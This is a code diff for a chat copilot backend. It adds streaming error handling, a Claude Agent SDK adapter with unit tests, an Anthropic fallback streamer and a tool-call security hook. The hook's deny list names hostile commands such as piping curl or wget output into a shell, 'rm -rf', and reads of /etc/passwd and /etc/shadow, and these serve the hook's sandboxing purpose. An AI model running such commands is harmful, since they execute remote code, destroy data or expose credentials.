+                if isinstance(chunk, StreamStart):
+                    continue
                 chunk_count += 1
                 if first_chunk_time is None:
                     first_chunk_time = time_module.perf_counter()
@@ -377,7 +437,7 @@
             gen_end_time = time_module.perf_counter()
             total_time = (gen_end_time - gen_start_time) * 1000
             logger.info(
-                f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
+                f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
                 f"task={task_id}, session={session_id}, "
                 f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
                 extra={
@@ -404,6 +464,17 @@
                     }
                 },
             )
+            # Publish a StreamError so the frontend can display an error message
+            try:
+                await stream_registry.publish_chunk(
+                    task_id,
+                    StreamError(
+                        errorText="An error occurred. Please try again.",
+                        code="stream_error",
+                    ),
+                )
+            except Exception:
+                pass  # Best-effort; mark_task_completed will publish StreamFinish
             await stream_registry.mark_task_completed(task_id, "failed")
 
         # Start the AI generation in a background task
@@ -506,8 +577,14 @@
                     "json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
                 },
             )
+            # Surface error to frontend so it doesn't appear stuck
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="stream_error",
+            ).to_sse()
+            yield StreamFinish().to_sse()
         finally:
-            # Unsubscribe when client disconnects or stream ends to prevent resource leak
+            # Unsubscribe when client disconnects or stream ends
             if subscriber_queue is not None:
                 try:
                     await stream_registry.unsubscribe_from_task(
@@ -751,8 +828,6 @@ async def stream_task(
     )
 
     async def event_generator() -> AsyncGenerator[str, None]:
-        import asyncio
-
         heartbeat_interval = 15.0  # Send heartbeat every 15 seconds
         try:
             while True:
New file, sdk/__init__.py (@@ -0,0 +1,14 @@, all lines added):

"""Claude Agent SDK integration for CoPilot.

This module provides the integration layer between the Claude Agent SDK
and the existing CoPilot tool system, enabling drop-in replacement of
the current LLM orchestration with the battle-tested Claude Agent SDK.
"""

from .service import stream_chat_completion_sdk
from .tool_adapter import create_copilot_mcp_server

__all__ = [
    "stream_chat_completion_sdk",
    "create_copilot_mcp_server",
]
New file, Anthropic SDK fallback module (@@ -0,0 +1,354 @@, all lines added):

"""Anthropic SDK fallback implementation.

This module provides the fallback streaming implementation using the Anthropic SDK
directly when the Claude Agent SDK is not available.
"""

import json
import logging
import os
import uuid
from collections.abc import AsyncGenerator
from typing import Any, cast

from ..config import ChatConfig
from ..model import ChatMessage, ChatSession
from ..response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
    StreamTextDelta,
    StreamTextEnd,
    StreamTextStart,
    StreamToolInputAvailable,
    StreamToolInputStart,
    StreamToolOutputAvailable,
    StreamUsage,
)
from .tool_adapter import get_tool_definitions, get_tool_handlers

logger = logging.getLogger(__name__)
config = ChatConfig()

# Maximum tool-call iterations before stopping to prevent infinite loops
_MAX_TOOL_ITERATIONS = 10


async def stream_with_anthropic(
    session: ChatSession,
    system_prompt: str,
    text_block_id: str,
) -> AsyncGenerator[StreamBaseResponse, None]:
    """Stream using Anthropic SDK directly with tool calling support.

    This function accumulates messages into the session for persistence.
    The caller should NOT yield an additional StreamFinish - this function handles it.
    """
    import anthropic

    # Only use ANTHROPIC_API_KEY - don't fall back to OpenRouter keys
    api_key = os.getenv("ANTHROPIC_API_KEY")
    if not api_key:
        yield StreamError(
            errorText="ANTHROPIC_API_KEY not configured for fallback",
            code="config_error",
        )
        yield StreamFinish()
        return

    client = anthropic.AsyncAnthropic(api_key=api_key)
    tool_definitions = get_tool_definitions()
    tool_handlers = get_tool_handlers()

    anthropic_tools = [
        {
            "name": t["name"],
            "description": t["description"],
            "input_schema": t["inputSchema"],
        }
        for t in tool_definitions
    ]

    anthropic_messages = _convert_session_to_anthropic(session)

    if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
        anthropic_messages.append(
            {"role": "user", "content": "Continue with the task."}
        )

    has_started_text = False
    accumulated_text = ""
    accumulated_tool_calls: list[dict[str, Any]] = []

    for _ in range(_MAX_TOOL_ITERATIONS):
        try:
            async with client.messages.stream(
                model=(
                    config.model.split("/")[-1] if "/" in config.model else config.model
                ),
                max_tokens=4096,
                system=system_prompt,
                messages=cast(Any, anthropic_messages),
                tools=cast(Any, anthropic_tools) if anthropic_tools else [],
            ) as stream:
                async for event in stream:
                    if event.type == "content_block_start":
                        block = event.content_block
                        if hasattr(block, "type"):
                            if block.type == "text" and not has_started_text:
                                yield StreamTextStart(id=text_block_id)
                                has_started_text = True
                            elif block.type == "tool_use":
                                yield StreamToolInputStart(
                                    toolCallId=block.id, toolName=block.name
                                )

                    elif event.type == "content_block_delta":
                        delta = event.delta
                        if hasattr(delta, "type") and delta.type == "text_delta":
                            accumulated_text += delta.text
                            yield StreamTextDelta(id=text_block_id, delta=delta.text)

                final_message = await stream.get_final_message()

                if final_message.stop_reason == "tool_use":
                    if has_started_text:
                        yield StreamTextEnd(id=text_block_id)
                        has_started_text = False
                        text_block_id = str(uuid.uuid4())

                    tool_results = []
                    assistant_content: list[dict[str, Any]] = []

                    for block in final_message.content:
                        if block.type == "text":
                            assistant_content.append(
                                {"type": "text", "text": block.text}
                            )
                        elif block.type == "tool_use":
                            assistant_content.append(
                                {
                                    "type": "tool_use",
                                    "id": block.id,
                                    "name": block.name,
                                    "input": block.input,
                                }
                            )

                            # Track tool call for session persistence
                            accumulated_tool_calls.append(
                                {
                                    "id": block.id,
                                    "type": "function",
                                    "function": {
                                        "name": block.name,
                                        "arguments": json.dumps(
                                            block.input
                                            if isinstance(block.input, dict)
                                            else {}
                                        ),
                                    },
                                }
                            )

                            yield StreamToolInputAvailable(
                                toolCallId=block.id,
                                toolName=block.name,
                                input=(
                                    block.input if isinstance(block.input, dict) else {}
                                ),
                            )

                            output, is_error = await _execute_tool(
                                block.name, block.input, tool_handlers
                            )

                            yield StreamToolOutputAvailable(
                                toolCallId=block.id,
                                toolName=block.name,
                                output=output,
                                success=not is_error,
                            )

                            # Save tool result to session
                            session.messages.append(
                                ChatMessage(
                                    role="tool",
                                    content=output,
                                    tool_call_id=block.id,
                                )
                            )

                            tool_results.append(
                                {
                                    "type": "tool_result",
                                    "tool_use_id": block.id,
                                    "content": output,
                                    "is_error": is_error,
                                }
                            )

                    # Save assistant message with tool calls to session
                    session.messages.append(
                        ChatMessage(
                            role="assistant",
                            content=accumulated_text or None,
                            tool_calls=(
                                accumulated_tool_calls
                                if accumulated_tool_calls
                                else None
                            ),
                        )
                    )
                    # Reset for next iteration
                    accumulated_text = ""
                    accumulated_tool_calls = []

                    anthropic_messages.append(
                        {"role": "assistant", "content": assistant_content}
                    )
                    anthropic_messages.append({"role": "user", "content": tool_results})
                    continue

                else:
                    if has_started_text:
                        yield StreamTextEnd(id=text_block_id)

                    # Save final assistant response to session
                    if accumulated_text:
                        session.messages.append(
                            ChatMessage(role="assistant", content=accumulated_text)
                        )

                    yield StreamUsage(
                        promptTokens=final_message.usage.input_tokens,
                        completionTokens=final_message.usage.output_tokens,
                        totalTokens=final_message.usage.input_tokens
                        + final_message.usage.output_tokens,
                    )
                    yield StreamFinish()
                    return

        except Exception as e:
            logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
            yield StreamError(
                errorText="An error occurred. Please try again.",
                code="anthropic_error",
            )
            yield StreamFinish()
            return

    yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
    yield StreamFinish()


def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
    """Convert session messages to Anthropic format.

    Handles merging consecutive same-role messages (Anthropic requires alternating roles).
    """
    messages: list[dict[str, Any]] = []

    for msg in session.messages:
        if msg.role == "user":
            new_msg = {"role": "user", "content": msg.content or ""}
        elif msg.role == "assistant":
            content: list[dict[str, Any]] = []
            if msg.content:
                content.append({"type": "text", "text": msg.content})
            if msg.tool_calls:
                for tc in msg.tool_calls:
                    func = tc.get("function", {})
                    args = func.get("arguments", {})
                    if isinstance(args, str):
                        try:
                            args = json.loads(args)
                        except json.JSONDecodeError:
                            args = {}
                    content.append(
                        {
                            "type": "tool_use",
                            "id": tc.get("id", str(uuid.uuid4())),
                            "name": func.get("name", ""),
                            "input": args,
                        }
                    )
            if content:
                new_msg = {"role": "assistant", "content": content}
            else:
                continue  # Skip empty assistant messages
        elif msg.role == "tool":
            new_msg = {
                "role": "user",
                "content": [
                    {
                        "type": "tool_result",
                        "tool_use_id": msg.tool_call_id or "",
                        "content": msg.content or "",
                    }
                ],
            }
        else:
            continue

        messages.append(new_msg)

    # Merge consecutive same-role messages (Anthropic requires alternating roles)
    return _merge_consecutive_roles(messages)


def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Merge consecutive messages with the same role.

    Anthropic API requires alternating user/assistant roles.
    """
    if not messages:
        return []

    merged: list[dict[str, Any]] = []
    for msg in messages:
        if merged and merged[-1]["role"] == msg["role"]:
            # Merge with previous message
            prev_content = merged[-1]["content"]
            new_content = msg["content"]

            # Normalize both to list-of-blocks form
            if isinstance(prev_content, str):
                prev_content = [{"type": "text", "text": prev_content}]
            if isinstance(new_content, str):
                new_content = [{"type": "text", "text": new_content}]

            # Ensure both are lists
            if not isinstance(prev_content, list):
                prev_content = [prev_content]
            if not isinstance(new_content, list):
                new_content = [new_content]

            merged[-1]["content"] = prev_content + new_content
        else:
            merged.append(msg)

    return merged
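A quick illustration of the merge behavior, calling the function defined above:

msgs = [
    {"role": "user", "content": "hi"},
    {"role": "user", "content": [{"type": "tool_result", "tool_use_id": "t1", "content": "ok"}]},
    {"role": "assistant", "content": "done"},
]
print(_merge_consecutive_roles(msgs))
# The two consecutive user messages collapse into one whose content is
# [{"type": "text", "text": "hi"}, {"type": "tool_result", ...}], restoring
# the strict user/assistant alternation the Anthropic API requires.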
|
|
||||||
|
|
||||||
|
async def _execute_tool(
|
||||||
|
tool_name: str, tool_input: Any, handlers: dict[str, Any]
|
||||||
|
) -> tuple[str, bool]:
|
||||||
|
"""Execute a tool and return (output, is_error)."""
|
||||||
|
handler = handlers.get(tool_name)
|
||||||
|
if not handler:
|
||||||
|
return f"Unknown tool: {tool_name}", True
|
||||||
|
|
||||||
|
try:
|
||||||
|
result = await handler(tool_input)
|
||||||
|
# Safely extract output - handle empty or missing content
|
||||||
|
content = result.get("content") or []
|
||||||
|
if content and isinstance(content, list) and len(content) > 0:
|
||||||
|
first_item = content[0]
|
||||||
|
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
|
||||||
|
else:
|
||||||
|
output = ""
|
||||||
|
is_error = result.get("isError", False)
|
||||||
|
return output, is_error
|
||||||
|
except Exception as e:
|
||||||
|
return f"Error: {str(e)}", True
|
||||||
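
# Illustrative sketch (not part of the diff): how _merge_consecutive_roles
# behaves when two same-role messages arrive back to back — both contents are
# normalized to content-block lists and concatenated under a single message:
#
#   merged = _merge_consecutive_roles(
#       [
#           {"role": "user", "content": "hi"},
#           {"role": "user", "content": [
#               {"type": "tool_result", "tool_use_id": "t1", "content": "ok"},
#           ]},
#       ]
#   )
#   assert merged == [
#       {
#           "role": "user",
#           "content": [
#               {"type": "text", "text": "hi"},
#               {"type": "tool_result", "tool_use_id": "t1", "content": "ok"},
#           ],
#       }
#   ]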
@@ -0,0 +1,198 @@
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.

This module provides the adapter layer that converts streaming messages from
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
the frontend expects.
"""

import json
import logging
import uuid

from claude_agent_sdk import (
    AssistantMessage,
    Message,
    ResultMessage,
    SystemMessage,
    TextBlock,
    ToolResultBlock,
    ToolUseBlock,
    UserMessage,
)

from backend.api.features.chat.response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
    StreamFinishStep,
    StreamStart,
    StreamStartStep,
    StreamTextDelta,
    StreamTextEnd,
    StreamTextStart,
    StreamToolInputAvailable,
    StreamToolInputStart,
    StreamToolOutputAvailable,
)
from backend.api.features.chat.sdk.tool_adapter import (
    MCP_TOOL_PREFIX,
    pop_pending_tool_output,
)

logger = logging.getLogger(__name__)


class SDKResponseAdapter:
    """Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.

    This class maintains state during a streaming session to properly track
    text blocks, tool calls, and message lifecycle.
    """

    def __init__(self, message_id: str | None = None):
        self.message_id = message_id or str(uuid.uuid4())
        self.text_block_id = str(uuid.uuid4())
        self.has_started_text = False
        self.has_ended_text = False
        self.current_tool_calls: dict[str, dict[str, str]] = {}
        self.task_id: str | None = None
        self.step_open = False

    def set_task_id(self, task_id: str) -> None:
        """Set the task ID for reconnection support."""
        self.task_id = task_id

    def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
        """Convert a single SDK message to Vercel AI SDK format."""
        responses: list[StreamBaseResponse] = []

        if isinstance(sdk_message, SystemMessage):
            if sdk_message.subtype == "init":
                responses.append(
                    StreamStart(messageId=self.message_id, taskId=self.task_id)
                )
                # Open the first step (matches non-SDK: StreamStart then StreamStartStep)
                responses.append(StreamStartStep())
                self.step_open = True

        elif isinstance(sdk_message, AssistantMessage):
            # After tool results, the SDK sends a new AssistantMessage for the
            # next LLM turn. Open a new step if the previous one was closed.
            if not self.step_open:
                responses.append(StreamStartStep())
                self.step_open = True

            for block in sdk_message.content:
                if isinstance(block, TextBlock):
                    if block.text:
                        self._ensure_text_started(responses)
                        responses.append(
                            StreamTextDelta(id=self.text_block_id, delta=block.text)
                        )

                elif isinstance(block, ToolUseBlock):
                    self._end_text_if_open(responses)

                    # Strip MCP prefix so frontend sees "find_block"
                    # instead of "mcp__copilot__find_block".
                    tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)

                    responses.append(
                        StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
                    )
                    responses.append(
                        StreamToolInputAvailable(
                            toolCallId=block.id,
                            toolName=tool_name,
                            input=block.input,
                        )
                    )
                    self.current_tool_calls[block.id] = {"name": tool_name}

        elif isinstance(sdk_message, UserMessage):
            # UserMessage carries tool results back from tool execution.
            content = sdk_message.content
            blocks = content if isinstance(content, list) else []
            for block in blocks:
                if isinstance(block, ToolResultBlock) and block.tool_use_id:
                    tool_info = self.current_tool_calls.get(block.tool_use_id, {})
                    tool_name = tool_info.get("name", "unknown")

                    # Prefer the stashed full output over the SDK's
                    # (potentially truncated) ToolResultBlock content.
                    # The SDK truncates large results, writing them to disk,
                    # which breaks frontend widget parsing.
                    output = pop_pending_tool_output(tool_name) or (
                        _extract_tool_output(block.content)
                    )

                    responses.append(
                        StreamToolOutputAvailable(
                            toolCallId=block.tool_use_id,
                            toolName=tool_name,
                            output=output,
                            success=not (block.is_error or False),
                        )
                    )

            # Close the current step after tool results — the next
            # AssistantMessage will open a new step for the continuation.
            if self.step_open:
                responses.append(StreamFinishStep())
                self.step_open = False

        elif isinstance(sdk_message, ResultMessage):
            self._end_text_if_open(responses)
            # Close the step before finishing.
            if self.step_open:
                responses.append(StreamFinishStep())
                self.step_open = False

            if sdk_message.subtype == "success":
                responses.append(StreamFinish())
            elif sdk_message.subtype in ("error", "error_during_execution"):
                error_msg = getattr(sdk_message, "result", None) or "Unknown error"
                responses.append(
                    StreamError(errorText=str(error_msg), code="sdk_error")
                )
                responses.append(StreamFinish())

        else:
            logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")

        return responses

    def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
        """Start (or restart) a text block if needed."""
        if not self.has_started_text or self.has_ended_text:
            if self.has_ended_text:
                self.text_block_id = str(uuid.uuid4())
                self.has_ended_text = False
            responses.append(StreamTextStart(id=self.text_block_id))
            self.has_started_text = True

    def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
        """End the current text block if one is open."""
        if self.has_started_text and not self.has_ended_text:
            responses.append(StreamTextEnd(id=self.text_block_id))
            self.has_ended_text = True


def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
    """Extract a string output from a ToolResultBlock's content field."""
    if isinstance(content, str):
        return content
    if isinstance(content, list):
        parts = [item.get("text", "") for item in content if item.get("type") == "text"]
        if parts:
            return "".join(parts)
        try:
            return json.dumps(content)
        except (TypeError, ValueError):
            return str(content)
    if content is None:
        return ""
    try:
        return json.dumps(content)
    except (TypeError, ValueError):
        return str(content)
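
# Illustrative sketch (not part of the diff): driving SDKResponseAdapter over
# an SDK message stream. `sdk_messages` is a hypothetical iterable of Claude
# Agent SDK messages; each converted event would be serialized to the
# frontend's UI stream.
#
#   adapter = SDKResponseAdapter(message_id="msg-1")
#   adapter.set_task_id("task-1")
#   for sdk_message in sdk_messages:
#       for event in adapter.convert_message(sdk_message):
#           ...  # e.g. yield event to the SSE response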
@@ -0,0 +1,366 @@
"""Unit tests for the SDK response adapter."""

from claude_agent_sdk import (
    AssistantMessage,
    ResultMessage,
    SystemMessage,
    TextBlock,
    ToolResultBlock,
    ToolUseBlock,
    UserMessage,
)

from backend.api.features.chat.response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
    StreamFinishStep,
    StreamStart,
    StreamStartStep,
    StreamTextDelta,
    StreamTextEnd,
    StreamTextStart,
    StreamToolInputAvailable,
    StreamToolInputStart,
    StreamToolOutputAvailable,
)

from .response_adapter import SDKResponseAdapter
from .tool_adapter import MCP_TOOL_PREFIX


def _adapter() -> SDKResponseAdapter:
    a = SDKResponseAdapter(message_id="msg-1")
    a.set_task_id("task-1")
    return a


# -- SystemMessage -----------------------------------------------------------


def test_system_init_emits_start_and_step():
    adapter = _adapter()
    results = adapter.convert_message(SystemMessage(subtype="init", data={}))
    assert len(results) == 2
    assert isinstance(results[0], StreamStart)
    assert results[0].messageId == "msg-1"
    assert results[0].taskId == "task-1"
    assert isinstance(results[1], StreamStartStep)


def test_system_non_init_emits_nothing():
    adapter = _adapter()
    results = adapter.convert_message(SystemMessage(subtype="other", data={}))
    assert results == []


# -- AssistantMessage with TextBlock -----------------------------------------


def test_text_block_emits_step_start_and_delta():
    adapter = _adapter()
    msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
    results = adapter.convert_message(msg)
    assert len(results) == 3
    assert isinstance(results[0], StreamStartStep)
    assert isinstance(results[1], StreamTextStart)
    assert isinstance(results[2], StreamTextDelta)
    assert results[2].delta == "hello"


def test_empty_text_block_emits_only_step():
    adapter = _adapter()
    msg = AssistantMessage(content=[TextBlock(text="")], model="test")
    results = adapter.convert_message(msg)
    # Empty text skipped, but step still opens
    assert len(results) == 1
    assert isinstance(results[0], StreamStartStep)


def test_multiple_text_deltas_reuse_block_id():
    adapter = _adapter()
    msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
    msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
    r1 = adapter.convert_message(msg1)
    r2 = adapter.convert_message(msg2)
    # First gets step+start+delta, second only delta (block & step already started)
    assert len(r1) == 3
    assert isinstance(r1[0], StreamStartStep)
    assert isinstance(r1[1], StreamTextStart)
    assert len(r2) == 1
    assert isinstance(r2[0], StreamTextDelta)
    assert r1[1].id == r2[0].id  # same block ID


# -- AssistantMessage with ToolUseBlock --------------------------------------


def test_tool_use_emits_input_start_and_available():
    """Tool names arrive with MCP prefix and should be stripped for the frontend."""
    adapter = _adapter()
    msg = AssistantMessage(
        content=[
            ToolUseBlock(
                id="tool-1",
                name=f"{MCP_TOOL_PREFIX}find_agent",
                input={"q": "x"},
            )
        ],
        model="test",
    )
    results = adapter.convert_message(msg)
    assert len(results) == 3
    assert isinstance(results[0], StreamStartStep)
    assert isinstance(results[1], StreamToolInputStart)
    assert results[1].toolCallId == "tool-1"
    assert results[1].toolName == "find_agent"  # prefix stripped
    assert isinstance(results[2], StreamToolInputAvailable)
    assert results[2].toolName == "find_agent"  # prefix stripped
    assert results[2].input == {"q": "x"}


def test_text_then_tool_ends_text_block():
    adapter = _adapter()
    text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
    tool_msg = AssistantMessage(
        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
        model="test",
    )
    adapter.convert_message(text_msg)  # opens step + text
    results = adapter.convert_message(tool_msg)
    # Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
    assert len(results) == 3
    assert isinstance(results[0], StreamTextEnd)
    assert isinstance(results[1], StreamToolInputStart)


# -- UserMessage with ToolResultBlock ----------------------------------------


def test_tool_result_emits_output_and_finish_step():
    adapter = _adapter()
    # First register the tool call (opens step) — SDK sends prefixed name
    tool_msg = AssistantMessage(
        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
        model="test",
    )
    adapter.convert_message(tool_msg)

    # Now send tool result
    result_msg = UserMessage(
        content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
    )
    results = adapter.convert_message(result_msg)
    assert len(results) == 2
    assert isinstance(results[0], StreamToolOutputAvailable)
    assert results[0].toolCallId == "t1"
    assert results[0].toolName == "find_agent"  # prefix stripped
    assert results[0].output == "found 3 agents"
    assert results[0].success is True
    assert isinstance(results[1], StreamFinishStep)


def test_tool_result_error():
    adapter = _adapter()
    adapter.convert_message(
        AssistantMessage(
            content=[
                ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
            ],
            model="test",
        )
    )
    result_msg = UserMessage(
        content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
    )
    results = adapter.convert_message(result_msg)
    assert isinstance(results[0], StreamToolOutputAvailable)
    assert results[0].success is False
    assert isinstance(results[1], StreamFinishStep)


def test_tool_result_list_content():
    adapter = _adapter()
    adapter.convert_message(
        AssistantMessage(
            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
            model="test",
        )
    )
    result_msg = UserMessage(
        content=[
            ToolResultBlock(
                tool_use_id="t1",
                content=[
                    {"type": "text", "text": "line1"},
                    {"type": "text", "text": "line2"},
                ],
            )
        ]
    )
    results = adapter.convert_message(result_msg)
    assert isinstance(results[0], StreamToolOutputAvailable)
    assert results[0].output == "line1line2"
    assert isinstance(results[1], StreamFinishStep)


def test_string_user_message_ignored():
    """A plain string UserMessage (not tool results) produces no output."""
    adapter = _adapter()
    results = adapter.convert_message(UserMessage(content="hello"))
    assert results == []


# -- ResultMessage -----------------------------------------------------------


def test_result_success_emits_finish_step_and_finish():
    adapter = _adapter()
    # Start some text first (opens step)
    adapter.convert_message(
        AssistantMessage(content=[TextBlock(text="done")], model="test")
    )
    msg = ResultMessage(
        subtype="success",
        duration_ms=100,
        duration_api_ms=50,
        is_error=False,
        num_turns=1,
        session_id="s1",
    )
    results = adapter.convert_message(msg)
    # TextEnd + FinishStep + StreamFinish
    assert len(results) == 3
    assert isinstance(results[0], StreamTextEnd)
    assert isinstance(results[1], StreamFinishStep)
    assert isinstance(results[2], StreamFinish)


def test_result_error_emits_error_and_finish():
    adapter = _adapter()
    msg = ResultMessage(
        subtype="error",
        duration_ms=100,
        duration_api_ms=50,
        is_error=True,
        num_turns=0,
        session_id="s1",
        result="API rate limited",
    )
    results = adapter.convert_message(msg)
    # No step was open, so no FinishStep — just Error + Finish
    assert len(results) == 2
    assert isinstance(results[0], StreamError)
    assert "API rate limited" in results[0].errorText
    assert isinstance(results[1], StreamFinish)


# -- Text after tools (new block ID) ----------------------------------------


def test_text_after_tool_gets_new_block_id():
    adapter = _adapter()
    # Text -> Tool -> ToolResult -> Text should get a new text block ID and step
    adapter.convert_message(
        AssistantMessage(content=[TextBlock(text="before")], model="test")
    )
    adapter.convert_message(
        AssistantMessage(
            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
            model="test",
        )
    )
    # Send tool result (closes step)
    adapter.convert_message(
        UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
    )
    results = adapter.convert_message(
        AssistantMessage(content=[TextBlock(text="after")], model="test")
    )
    # Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
    assert len(results) == 3
    assert isinstance(results[0], StreamStartStep)
    assert isinstance(results[1], StreamTextStart)
    assert isinstance(results[2], StreamTextDelta)
    assert results[2].delta == "after"


# -- Full conversation flow --------------------------------------------------


def test_full_conversation_flow():
    """Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
    adapter = _adapter()
    all_responses: list[StreamBaseResponse] = []

    # 1. Init
    all_responses.extend(
        adapter.convert_message(SystemMessage(subtype="init", data={}))
    )
    # 2. Assistant text
    all_responses.extend(
        adapter.convert_message(
            AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
        )
    )
    # 3. Tool use
    all_responses.extend(
        adapter.convert_message(
            AssistantMessage(
                content=[
                    ToolUseBlock(
                        id="t1",
                        name=f"{MCP_TOOL_PREFIX}find_agent",
                        input={"query": "email"},
                    )
                ],
                model="test",
            )
        )
    )
    # 4. Tool result
    all_responses.extend(
        adapter.convert_message(
            UserMessage(
                content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
            )
        )
    )
    # 5. More text
    all_responses.extend(
        adapter.convert_message(
            AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
        )
    )
    # 6. Result
    all_responses.extend(
        adapter.convert_message(
            ResultMessage(
                subtype="success",
                duration_ms=500,
                duration_api_ms=400,
                is_error=False,
                num_turns=2,
                session_id="s1",
            )
        )
    )

    types = [type(r).__name__ for r in all_responses]
    assert types == [
        "StreamStart",
        "StreamStartStep",  # step 1: text + tool call
        "StreamTextStart",
        "StreamTextDelta",  # "Let me search"
        "StreamTextEnd",  # closed before tool
        "StreamToolInputStart",
        "StreamToolInputAvailable",
        "StreamToolOutputAvailable",  # tool result
        "StreamFinishStep",  # step 1 closed after tool result
        "StreamStartStep",  # step 2: continuation text
        "StreamTextStart",  # new block after tool
        "StreamTextDelta",  # "I found 2"
        "StreamTextEnd",  # closed by result
        "StreamFinishStep",  # step 2 closed
        "StreamFinish",
    ]
@@ -0,0 +1,393 @@
"""Security hooks for Claude Agent SDK integration.

This module provides security hooks that validate tool calls before execution,
ensuring multi-user isolation and preventing unauthorized operations.
"""

import json
import logging
import os
import re
import shlex
from typing import Any, cast

from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX

logger = logging.getLogger(__name__)

# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
    "bash",
    "shell",
    "exec",
    "terminal",
    "command",
}

# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
    # JSON / structured data
    "jq",
    # Text processing
    "grep",
    "egrep",
    "fgrep",
    "rg",
    "head",
    "tail",
    "cat",
    "wc",
    "sort",
    "uniq",
    "cut",
    "tr",
    "sed",
    "awk",
    "column",
    "fold",
    "fmt",
    "nl",
    "paste",
    "rev",
    # File inspection (read-only)
    "find",
    "ls",
    "file",
    "stat",
    "du",
    "tree",
    "basename",
    "dirname",
    "realpath",
    # Utilities
    "echo",
    "printf",
    "date",
    "true",
    "false",
    "xargs",
    "tee",
    # Comparison / encoding
    "diff",
    "comm",
    "base64",
    "md5sum",
    "sha256sum",
}

# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}

# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}

# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
    r"sudo",
    r"rm\s+-rf",
    r"dd\s+if=",
    r"/etc/passwd",
    r"/etc/shadow",
    r"chmod\s+777",
    r"curl\s+.*\|.*sh",
    r"wget\s+.*\|.*sh",
    r"eval\s*\(",
    r"exec\s*\(",
    r"__import__",
    r"os\.system",
    r"subprocess",
]


def _deny(reason: str) -> dict[str, Any]:
    """Return a hook denial response."""
    return {
        "hookSpecificOutput": {
            "hookEventName": "PreToolUse",
            "permissionDecision": "deny",
            "permissionDecisionReason": reason,
        }
    }


def _validate_workspace_path(
    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
    """Validate that a workspace-scoped tool only accesses allowed paths.

    Allowed directories:
    - The SDK working directory (``/tmp/copilot-<session>/``)
    - The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
    """
    path = tool_input.get("file_path") or tool_input.get("path") or ""
    if not path:
        # Glob/Grep without a path default to cwd which is already sandboxed
        return {}

    resolved = os.path.normpath(os.path.expanduser(path))

    # Allow access within the SDK working directory
    if sdk_cwd:
        norm_cwd = os.path.normpath(sdk_cwd)
        if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
            return {}

    # Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
    claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
    if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
        return {}

    logger.warning(
        f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
    )
    return _deny(
        f"Tool '{tool_name}' can only access files within the workspace directory."
    )


def _validate_bash_command(
    tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
    """Validate a Bash command against the allowlist of safe commands.

    Only read-only data-processing commands are allowed (jq, grep, head, etc.).
    Blocks command substitution, output redirection, and disallowed executables.

    Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
    containing ``|`` won't be mistaken for shell pipes).
    """
    command = tool_input.get("command", "")
    if not command or not isinstance(command, str):
        return _deny("Bash command is empty.")

    # Block command substitution — can smuggle arbitrary commands
    if "$(" in command or "`" in command:
        return _deny("Command substitution ($() or ``) is not allowed in Bash.")

    # Block output redirection — Bash should be read-only
    if re.search(r"(?<!\d)>{1,2}\s", command):
        return _deny("Output redirection (> or >>) is not allowed in Bash.")

